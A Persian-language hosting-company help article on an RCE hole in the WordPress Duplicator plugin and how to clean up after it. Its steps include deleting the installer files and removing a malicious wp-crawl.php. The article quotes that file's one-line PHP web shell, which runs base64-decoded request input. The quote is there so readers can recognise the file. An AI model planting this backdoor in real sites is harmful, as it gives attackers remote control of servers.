013-3413
مرکز آموزش میهن وب هاست

مرکز آموزش میهن وب هاست

مشکل هک شدن سایت به دلیل وجود باگ امنیتی در افزونه Duplicator وردپرس

پرینت این مقاله پرینت این مقاله

در نسخه 1.2.42 و پایین تر افزونه Duplicator یک حفره امنیتی وجود دارد به نحوی که امکان اجرای کد به صورت ریموت (Remote Code Execution) را به هکرها می دهد. هکر ها از این باگ امنیتی سطح بالا استفاده کرده و به صورت گسترده تعدادی زیادی از سایت های وردپرسی در سطح جهان را هک کرده اند.
توجه داشته باشید صرفا نصب افزونه Duplicator مشکلی امنیتی برای سایت ایجاد نمی کند اما بعد از استفاده آن و ایجاد بسته نصبی، سایت در معرض هک شدن قرار می گیرد.
بعد از نصب قالب به کمک بسته نصبی، فایل‌های زیر و پوشه wp-snapshot نیز در کنار سایر بخش های پیشفرض وردپرس قرار می گیرند.
database.php ،installer.php ،installer-backup.php ،installer-log.txt ،installer-data.sql
در بسیاری موارد نیز کاربران فراموش می کنند فایل های نصبی افزونه داپلیکیتور را حذف کنند و مشکل دقیقا از همین جا شروع می شود. هکر می تواند با دسترسی به فایل نصبی اقدام به تغییرات گسترده در فایل wp-config.php و در نتیجه ریست کردن کامل اطلاعات درون این فایل کند. لذا در اولین قدم سایت از دسترس خارج می شود.
برای رفع مشکل پیشنهاد می شود مراحل زیر را انجام دهید:

1. در اولین قدم فایل های زیر را از هاست حذف نمائید: 
  • The ZIP archive (unique)
  • database.sql
  • installer-backup.php
  • installer-data.sql
  • installer-log.txt
  • installer.php
2. در صورتی که داخل هاست شما و در پوشه public_html فایل wp-crawl.php را مشاهده می کنید، سریعا آن را حذف نمائید. این فایل مخرب بوده و دسترسی لازم را به هکر می دهد تا دسترسی به هاست شما داشته باشد. نمونه کدی که در فایل ذکر شده مشاهده شده است به صورت زیر است:
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');
3. افزونه Duplicator را از وردپرسحذف نموده یا آن را غیرفعال نمایید. البته در صورتی که افزونه Duplicator را به آخرین نسخه آپدیت و فایل نصبی را حذف نمائید خطری سایت شما را تهدید نمی کند.
4. برای در دسترس قرار دادن مجدد سایت نیز فایل خام wp-config.php را در هاست آپلود کرده (می توانید جدیدترین نسخه وردپرس را از سایت رسمی آن دانلود و فایل فوق را از آن استخراج نمائید) و اطلاعات دیتابیس را مجدد در درون آن قرار دهید تا سایت شما مجدد در دسترس قرار گیرد.
همواره می توانید با رعایت موارد امنیتی در سایت های وردپرسی تا حدی زیادی از هک یا ویروسی شدن سایت جلوگیری کنید. پیشنهاد می شود موارد ذکر شده در لینک زیر را به صورت کامل در سایت وردپرسی خود انجام دهید :

برای مشاهده آموزش اینجا کلیک کنید
4/5 از 7 رای

پشتیبانی 7 روز هفته و 24 ساعت شبانه روز

میهن وب هاست

میهن وب هاست شروع تحقق یک رویاست

کلیه حقوق مادی و معنوی این وب سایت برای شرکت دانش بنیان ارتباطات نت میهن محفوظ می باشد.